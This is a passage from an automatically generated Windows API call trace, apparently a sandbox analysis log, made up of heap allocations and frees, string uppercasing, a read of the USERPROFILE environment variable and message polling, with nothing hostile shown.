Size=0x20) returned 0x2a77c88 [0174.623] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72398 [0174.623] CharUpperBuffW (in: lpsz="A2100602512", cchLength=0xb | out: lpsz="A2100602512") returned 0xb [0174.623] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c88 | out: hHeap=0x2af0000) returned 1 [0174.623] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0174.623] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0174.623] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a722a8 [0174.623] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa540 [0174.623] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa558 [0174.623] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722f8 [0174.623] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5b8 [0174.623] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa690 [0174.623] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72248 [0174.623] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa750 [0174.623] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72248 | out: hHeap=0x2af0000) returned 1 [0174.623] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a683a8 [0174.624] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72268 [0174.624] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0174.624] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6d8 [0174.624] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa630 [0174.624] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa648 [0174.624] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa570 [0174.624] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6d8 | out: hHeap=0x2af0000) returned 1 [0174.624] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa588 [0174.624] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72318 [0174.624] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf3a8, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0174.624] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5a0 [0174.624] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cd8 [0174.624] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721d8 [0174.624] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72318 | out: hHeap=0x2af0000) returned 1 [0174.624] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a683a8 | out: hHeap=0x2af0000) returned 1 [0174.624] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0174.624] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa570 | out: hHeap=0x2af0000) returned 1 [0174.624] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa648 | out: hHeap=0x2af0000) returned 1 [0174.624] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa588 | out: hHeap=0x2af0000) returned 1 [0174.624] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa630 | out: hHeap=0x2af0000) returned 1 [0174.624] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa750 | out: hHeap=0x2af0000) returned 1 [0174.624] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa690 | out: hHeap=0x2af0000) returned 1 [0174.624] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5b8 | out: hHeap=0x2af0000) returned 1 [0174.624] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72338 [0174.624] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6fc0 [0174.624] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa678 [0174.624] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x80) returned 0x29f7878 [0174.624] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77cd8 | out: hHeap=0x2af0000) returned 1 [0174.625] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa678 | out: hHeap=0x2af0000) returned 1 [0174.625] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72318 [0174.625] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72318 | out: hHeap=0x2af0000) returned 1 [0174.625] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5b8 [0174.625] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5b8 | out: hHeap=0x2af0000) returned 1 [0174.625] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6fc0 | out: hHeap=0x2af0000) returned 1 [0174.625] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0174.625] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722f8 | out: hHeap=0x2af0000) returned 1 [0174.625] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a722f8 [0174.625] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0174.625] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72368 [0174.625] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5e8 [0174.625] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7e0 [0174.625] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72318 [0174.625] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa630 [0174.625] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72318 | out: hHeap=0x2af0000) returned 1 [0174.625] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a683a8 [0174.625] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72268 [0174.625] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0174.625] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5d0 [0174.625] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa720 [0174.625] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa6f0 [0174.625] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0174.625] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5d0 | out: hHeap=0x2af0000) returned 1 [0174.625] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa810 [0174.625] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72318 [0174.625] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf3a8, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0174.625] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa648 [0174.626] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b70 [0174.626] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721e8 [0174.626] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72318 | out: hHeap=0x2af0000) returned 1 [0174.626] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a683a8 | out: hHeap=0x2af0000) returned 1 [0174.626] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0174.626] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa600 | out: hHeap=0x2af0000) returned 1 [0174.626] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6f0 | out: hHeap=0x2af0000) returned 1 [0174.626] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa810 | out: hHeap=0x2af0000) returned 1 [0174.626] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa720 | out: hHeap=0x2af0000) returned 1 [0174.626] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa630 | out: hHeap=0x2af0000) returned 1 [0174.626] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7e0 | out: hHeap=0x2af0000) returned 1 [0174.626] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5e8 | out: hHeap=0x2af0000) returned 1 [0174.626] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72288 [0174.626] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7080 [0174.626] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa750 [0174.626] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x90) returned 0x2a683a8 [0174.626] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b70 | out: hHeap=0x2af0000) returned 1 [0174.626] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa750 | out: hHeap=0x2af0000) returned 1 [0174.626] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa678 [0174.626] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa678 | out: hHeap=0x2af0000) returned 1 [0174.626] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7080 | out: hHeap=0x2af0000) returned 1 [0174.626] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72288 | out: hHeap=0x2af0000) returned 1 [0174.626] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0174.626] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72248 [0174.626] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa678 [0174.626] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722c8 [0174.626] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa780 [0174.627] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722c8 | out: hHeap=0x2af0000) returned 1 [0174.627] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a721f8 [0174.627] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa738 [0174.627] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72368 [0174.627] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0174.627] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa690 [0174.627] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c60 [0174.627] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa630 [0174.627] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72318 [0174.627] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa630 | out: hHeap=0x2af0000) returned 1 [0174.627] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d78 [0174.627] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6a8 [0174.627] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa750 [0174.627] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77da0 [0174.627] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6c0 [0174.627] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72368 [0174.627] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6c0 | out: hHeap=0x2af0000) returned 1 [0174.627] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77aa8 [0174.627] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7f8 [0174.627] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa810 [0174.627] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f08 [0174.627] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7e0 [0174.628] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72388 [0174.628] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7e0 | out: hHeap=0x2af0000) returned 1 [0174.628] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b70 [0174.628] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa828 [0174.628] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa798 [0174.628] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e40 [0174.628] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa570 [0174.628] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72208 [0174.628] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa570 | out: hHeap=0x2af0000) returned 1 [0174.628] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cd8 [0174.628] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6c0 [0174.628] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de40 [0174.628] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0174.628] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72218 [0174.628] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72338 [0174.628] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7c8 [0174.628] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7e0 [0174.628] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72228 [0174.628] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa570 [0174.628] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0174.628] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72228 [0174.628] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e68 [0174.628] CharUpperBuffW (in: lpsz="SSA2100602512", cchLength=0xd | out: lpsz="SSA2100602512") returned 0xd [0174.628] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e68 | out: hHeap=0x2af0000) returned 1 [0174.628] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0174.628] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa570 | out: hHeap=0x2af0000) returned 1 [0174.628] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7e0 | out: hHeap=0x2af0000) returned 1 [0174.628] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7c8 | out: hHeap=0x2af0000) returned 1 [0174.629] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0174.629] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0174.629] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e840 [0174.629] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0174.629] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e840 | out: hHeap=0x2af0000) returned 1 [0174.629] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0174.629] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6d8 [0174.629] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72328 [0174.629] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6d8 | out: hHeap=0x2af0000) returned 1 [0174.629] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77a80 [0174.629] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa630 [0174.629] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7e0 [0174.629] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72298 [0174.629] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cb0 [0174.629] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7c8 [0174.629] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72338 [0174.629] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7c8 | out: hHeap=0x2af0000) returned 1 [0174.629] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d00 [0174.629] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6d8 [0174.629] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa618 [0174.629] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa630 | out: hHeap=0x2af0000) returned 1 [0174.629] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7c8 [0174.629] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa570 [0174.629] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722c8 [0174.629] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77dc8 [0174.629] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6f0 [0174.629] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72218 [0174.629] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6f0 | out: hHeap=0x2af0000) returned 1 [0174.630] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d50 [0174.630] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5b8 [0174.630] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa588 [0174.630] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77a80 | out: hHeap=0x2af0000) returned 1 [0174.630] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72328 | out: hHeap=0x2af0000) returned 1 [0174.630] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7c8 | out: hHeap=0x2af0000) returned 1 [0174.630] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0174.630] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5d0 [0174.630] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72328 [0174.630] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5d0 | out: hHeap=0x2af0000) returned 1 [0174.630] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d28 [0174.630] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7c8 [0174.630] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6f0 [0174.630] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72278 [0174.630] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e68 [0174.630] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa630 [0174.630] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722d8 [0174.630] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa630 | out: hHeap=0x2af0000) returned 1 [0174.630] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77df0 [0174.630] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5d0 [0174.630] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5e8 [0174.630] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72228 [0174.630] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7c8 | out: hHeap=0x2af0000) returned 1 [0174.630] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0174.630] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0174.630] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72348 [0174.630] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa630 [0174.631] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0174.631] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa630 | out: hHeap=0x2af0000) returned 1 [0174.631] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa708 | out: hHeap=0x2af0000) returned 1 [0174.631] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa600 | out: hHeap=0x2af0000) returned 1 [0174.631] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0174.631] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6f0 | out: hHeap=0x2af0000) returned 1 [0174.631] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72278 | out: hHeap=0x2af0000) returned 1 [0174.631] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5e8 | out: hHeap=0x2af0000) returned 1 [0174.631] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7c8 [0174.631] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6f0 [0174.631] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72268 [0174.631] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e18 [0174.631] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0174.631] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72228 [0174.631] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa708 | out: hHeap=0x2af0000) returned 1 [0174.631] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e90 [0174.631] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0174.631] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa720 [0174.631] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72398 [0174.631] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7c8 | out: hHeap=0x2af0000) returned 1 [0174.631] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0174.631] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6f0 | out: hHeap=0x2af0000) returned 1 [0174.631] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0174.631] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa720 | out: hHeap=0x2af0000) returned 1 [0174.631] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d28 | out: hHeap=0x2af0000) returned 1 [0174.631] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72328 | out: hHeap=0x2af0000) returned 1 [0174.631] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0174.631] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5e8 [0174.632] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72348 [0174.632] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5e8 | out: hHeap=0x2af0000) returned 1 [0174.632] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b98 [0174.632] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa630 [0174.632] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6f0 [0174.632] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72328 [0174.632] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77af8 [0174.632] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7c8 [0174.632] RtlAllocateHeap (HeapHandle=0x2af0000, 